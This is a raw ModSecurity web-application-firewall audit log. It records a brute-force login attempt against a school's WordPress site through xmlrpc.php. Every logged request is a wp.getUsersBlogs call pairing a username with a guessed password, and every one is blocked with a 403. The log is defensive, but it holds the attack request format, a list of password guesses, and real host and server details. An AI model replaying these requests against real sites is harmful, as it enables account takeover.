Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9bd5597e-Z--
--d4604d7a-A--
[19/Apr/2025:20:21:36 +0700] aAOjYEruoUXZj665VUHwxAAAAM0 103.236.140.4 35350 103.236.140.4 8181
--d4604d7a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d4604d7a-C--
wp.getUsersBlogs
admin
a123456
--d4604d7a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d4604d7a-E--
--d4604d7a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068896690996 5561 (- - -)
Stopwatch2: 1745068896690996 5561; combined=3963, p1=515, p2=3247, p3=0, p4=0, p5=115, sr=119, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d4604d7a-Z--
--f4684249-A--
[19/Apr/2025:20:22:41 +0700] aAOjoevDiFC_ir7MDwbgXAAAAEY 103.236.140.4 35642 103.236.140.4 8181
--f4684249-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f4684249-C--
wp.getUsersBlogs
admin
fuckyou
--f4684249-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f4684249-E--
--f4684249-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745068961299454 5467 (- - -)
Stopwatch2: 1745068961299454 5467; combined=3856, p1=476, p2=3206, p3=0, p4=0, p5=101, sr=88, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f4684249-Z--
--6f7f9f23-A--
[19/Apr/2025:20:23:44 +0700] aAOj4OvDiFC_ir7MDwbgigAAAEQ 103.236.140.4 35940 103.236.140.4 8181
--6f7f9f23-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6f7f9f23-C--
wp.getUsersBlogs
admin
master
--6f7f9f23-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6f7f9f23-E--
--6f7f9f23-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069024161048 5752 (- - -)
Stopwatch2: 1745069024161048 5752; combined=4017, p1=520, p2=3308, p3=0, p4=0, p5=110, sr=103, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6f7f9f23-Z--
--140ad93c-A--
[19/Apr/2025:20:24:46 +0700] aAOkHg6cTFSgLAHl7PrSzAAAABA 103.236.140.4 36230 103.236.140.4 8181
--140ad93c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--140ad93c-C--
wp.getUsersBlogs
admin
william
--140ad93c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--140ad93c-E--
--140ad93c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069086953345 6031 (- - -)
Stopwatch2: 1745069086953345 6031; combined=4201, p1=482, p2=3462, p3=0, p4=0, p5=148, sr=90, sw=109, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--140ad93c-Z--
--d1c5a025-A--
[19/Apr/2025:20:25:47 +0700] aAOkW3Na4dA2HllpK_N2kQAAAI4 103.236.140.4 36502 103.236.140.4 8181
--d1c5a025-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d1c5a025-C--
wp.getUsersBlogs
admin
killer
--d1c5a025-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d1c5a025-E--
--d1c5a025-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069147342634 4580 (- - -)
Stopwatch2: 1745069147342634 4580; combined=3486, p1=366, p2=2917, p3=0, p4=0, p5=115, sr=78, sw=88, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d1c5a025-Z--
--d6336e12-A--
[19/Apr/2025:20:26:53 +0700] aAOknXNa4dA2HllpK_N2sQAAAJY 103.236.140.4 36816 103.236.140.4 8181
--d6336e12-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d6336e12-C--
wp.getUsersBlogs
admin
tinkerbell
--d6336e12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d6336e12-E--
--d6336e12-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069213441461 5152 (- - -)
Stopwatch2: 1745069213441461 5152; combined=4117, p1=461, p2=3408, p3=0, p4=0, p5=140, sr=88, sw=108, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d6336e12-Z--
--a86c573e-A--
[19/Apr/2025:20:27:53 +0700] aAOk2evDiFC_ir7MDwbg0QAAAEI 103.236.140.4 37090 103.236.140.4 8181
--a86c573e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a86c573e-C--
wp.getUsersBlogs
admin
Million2
--a86c573e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a86c573e-E--
--a86c573e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069273328828 5184 (- - -)
Stopwatch2: 1745069273328828 5184; combined=3773, p1=452, p2=3125, p3=0, p4=0, p5=112, sr=89, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a86c573e-Z--
--acde1a0e-A--
[19/Apr/2025:20:28:58 +0700] aAOlGg6cTFSgLAHl7PrS_QAAAA4 103.236.140.4 37402 103.236.140.4 8181
--acde1a0e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--acde1a0e-C--
wp.getUsersBlogs
admin
a801016
--acde1a0e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--acde1a0e-E--
--acde1a0e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069338441847 5192 (- - -)
Stopwatch2: 1745069338441847 5192; combined=3799, p1=494, p2=3127, p3=0, p4=0, p5=103, sr=86, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--acde1a0e-Z--
--dca1d43e-A--
[19/Apr/2025:20:30:01 +0700] aAOlWXNa4dA2HllpK_N3EQAAAIA 103.236.140.4 37672 103.236.140.4 8181
--dca1d43e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--dca1d43e-C--
wp.getUsersBlogs
wakakur
smkn22-jkt.sch
--dca1d43e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dca1d43e-E--
--dca1d43e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069401317888 4981 (- - -)
Stopwatch2: 1745069401317888 4981; combined=3705, p1=516, p2=3074, p3=0, p4=0, p5=69, sr=86, sw=46, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dca1d43e-Z--
--7ba6ba60-A--
[19/Apr/2025:20:31:05 +0700] aAOlmUruoUXZj665VUHxVwAAAMU 103.236.140.4 37974 103.236.140.4 8181
--7ba6ba60-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7ba6ba60-C--
wp.getUsersBlogs
wakakur
wakakur2019
--7ba6ba60-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7ba6ba60-E--
--7ba6ba60-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069465114877 5608 (- - -)
Stopwatch2: 1745069465114877 5608; combined=3989, p1=502, p2=3285, p3=0, p4=0, p5=115, sr=86, sw=87, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ba6ba60-Z--
--33ef8d63-A--
[19/Apr/2025:20:32:07 +0700] aAOl10ruoUXZj665VUHxcgAAAMY 103.236.140.4 38260 103.236.140.4 8181
--33ef8d63-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--33ef8d63-C--
wp.getUsersBlogs
wakakur
1qazxsw2
--33ef8d63-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--33ef8d63-E--
--33ef8d63-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069527393891 5583 (- - -)
Stopwatch2: 1745069527393891 5583; combined=4002, p1=493, p2=3323, p3=0, p4=0, p5=108, sr=87, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--33ef8d63-Z--
--975ebd20-A--
[19/Apr/2025:20:33:08 +0700] aAOmFHNa4dA2HllpK_N3QwAAAIs 103.236.140.4 38540 103.236.140.4 8181
--975ebd20-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--975ebd20-C--
wp.getUsersBlogs
wakakur
Beast3x@8*#4@!
--975ebd20-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--975ebd20-E--
--975ebd20-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069588138396 17428 (- - -)
Stopwatch2: 1745069588138396 17428; combined=27491, p1=472, p2=3427, p3=0, p4=0, p5=11811, sr=85, sw=93, l=0, gc=11688
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--975ebd20-Z--
--ee48ad11-A--
[19/Apr/2025:20:34:11 +0700] aAOmU0ruoUXZj665VUHxoAAAAMQ 103.236.140.4 38838 103.236.140.4 8181
--ee48ad11-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ee48ad11-C--
wp.getUsersBlogs
wakakur
wakakur1989
--ee48ad11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ee48ad11-E--
--ee48ad11-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069651374523 5344 (- - -)
Stopwatch2: 1745069651374523 5344; combined=4004, p1=466, p2=3323, p3=0, p4=0, p5=123, sr=88, sw=92, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ee48ad11-Z--
--70c23d07-A--
[19/Apr/2025:20:35:16 +0700] aAOmlEruoUXZj665VUHxrgAAAM0 103.236.140.4 39122 103.236.140.4 8181
--70c23d07-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--70c23d07-C--
wp.getUsersBlogs
wakakur
qwertyuiop
--70c23d07-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--70c23d07-E--
--70c23d07-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069716557656 5256 (- - -)
Stopwatch2: 1745069716557656 5256; combined=4152, p1=472, p2=3451, p3=0, p4=0, p5=137, sr=87, sw=92, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--70c23d07-Z--
--a42c9628-A--
[19/Apr/2025:20:36:16 +0700] aAOm0HNa4dA2HllpK_N3kgAAAIw 103.236.140.4 39406 103.236.140.4 8181
--a42c9628-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a42c9628-C--
wp.getUsersBlogs
wakakur
789456
--a42c9628-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a42c9628-E--
--a42c9628-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069776205054 4616 (- - -)
Stopwatch2: 1745069776205054 4616; combined=3441, p1=393, p2=2878, p3=0, p4=0, p5=99, sr=95, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a42c9628-Z--
--f1bfa413-A--
[19/Apr/2025:20:37:16 +0700] aAOnDEruoUXZj665VUHx8gAAAMs 103.236.140.4 39712 103.236.140.4 8181
--f1bfa413-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f1bfa413-C--
